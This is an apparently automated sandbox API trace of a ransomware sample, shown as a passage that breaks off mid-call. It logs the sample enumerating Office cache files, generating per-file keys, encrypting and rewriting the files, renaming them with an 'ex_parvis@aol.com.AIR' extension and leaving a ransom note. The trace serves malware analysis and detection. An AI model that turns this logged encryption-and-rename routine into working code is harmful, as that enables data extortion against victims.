1 [0136.044] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x30d0020 [0136.044] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4200) returned 0x31b0020 [0136.044] SetFilePointer (in: hFile=0x480, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.044] ReadFile (in: hFile=0x480, lpBuffer=0x30d0020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xd4200, lpOverlapped=0x0) returned 1 [0136.070] SetFilePointer (in: hFile=0x480, lDistanceToMove=-868864, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.070] WriteFile (in: hFile=0x480, lpBuffer=0x31b0020*, nNumberOfBytesToWrite=0xd4200, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31b0020*, lpNumberOfBytesWritten=0x2acf9c8*=0xd4200, lpOverlapped=0x0) returned 1 [0136.072] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0020 | out: hHeap=0x2e0000) returned 1 [0136.076] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31b0020 | out: hHeap=0x2e0000) returned 1 [0136.079] CloseHandle (hObject=0x480) returned 1 [0136.084] GetProcessHeap () returned 0x2e0000 [0136.084] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.084] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385428 | out: hHeap=0x2e0000) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x385368 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328d70 | out: hHeap=0x2e0000) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e468 | out: hHeap=0x2e0000) returned 1 [0136.085] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35df98 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.085] GetLastError () returned 0x0 [0136.085] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.085] GetLastError () returned 0x0 [0136.085] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.085] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.085] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.085] GetLastError () returned 0x0 [0136.086] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.086] GetLastError () returned 0x0 [0136.086] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.086] GetLastError () returned 0x0 [0136.086] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.086] GetLastError () returned 0x0 [0136.086] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328d70 [0136.086] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0136.086] GetLastError () returned 0x0 [0136.086] FindNextFileW (in: hFindFile=0x35df98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.086] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.086] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.086] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.086] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0136.087] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0136.087] GetProcessHeap () returned 0x2e0000 [0136.087] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x387410 [0136.087] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0136.087] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.087] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.090] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484 [0136.090] GetProcessHeap () returned 0x2e0000 [0136.090] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.090] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2362) returned 1 [0136.090] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x93a [0136.091] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.091] GetProcessHeap () returned 0x2e0000 [0136.091] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.091] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.091] WriteFile (in: hFile=0x484, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.092] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.092] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.092] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x93a) returned 0x387410 [0136.092] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x93a) returned 0x387d58 [0136.092] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.092] ReadFile (in: hFile=0x484, lpBuffer=0x387410, nNumberOfBytesToRead=0x93a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x93a, lpOverlapped=0x0) returned 1 [0136.092] SetFilePointer (in: hFile=0x484, lDistanceToMove=-2362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.093] WriteFile (in: hFile=0x484, lpBuffer=0x387d58*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387d58*, lpNumberOfBytesWritten=0x2acf9c8*=0x93a, lpOverlapped=0x0) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387d58 | out: hHeap=0x2e0000) returned 1 [0136.093] CloseHandle (hObject=0x484) returned 1 [0136.093] GetProcessHeap () returned 0x2e0000 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0136.093] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0136.093] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0136.093] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.093] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.094] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.094] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.094] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", dwFileAttributes=0x80) returned 1 [0136.094] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 76 [0136.094] GetProcessHeap () returned 0x2e0000 [0136.094] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0136.094] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0136.094] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0136.094] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.099] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484 [0136.099] GetProcessHeap () returned 0x2e0000 [0136.099] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.099] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2928955) returned 1 [0136.099] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2cb13b [0136.099] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.099] GetProcessHeap () returned 0x2e0000 [0136.099] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.099] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.099] WriteFile (in: hFile=0x484, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.101] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.101] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.101] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2cb13b) returned 0x30d0020 [0136.102] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2cb13b) returned 0x33a0020 [0136.102] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.102] ReadFile (in: hFile=0x484, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x2cb13b, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x2cb13b, lpOverlapped=0x0) returned 1 [0136.248] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.248] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.248] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", dwFileAttributes=0x80) returned 1 [0136.248] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 79 [0136.248] GetProcessHeap () returned 0x2e0000 [0136.248] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x387410 [0136.248] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0136.248] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0136.248] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.251] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x484 [0136.251] GetProcessHeap () returned 0x2e0000 [0136.251] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.251] GetFileSizeEx (in: hFile=0x484, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1383) returned 1 [0136.251] SetFilePointer (in: hFile=0x484, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x567 [0136.251] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.251] GetProcessHeap () returned 0x2e0000 [0136.251] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.251] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.251] WriteFile (in: hFile=0x484, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.253] WriteFile (in: hFile=0x484, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, 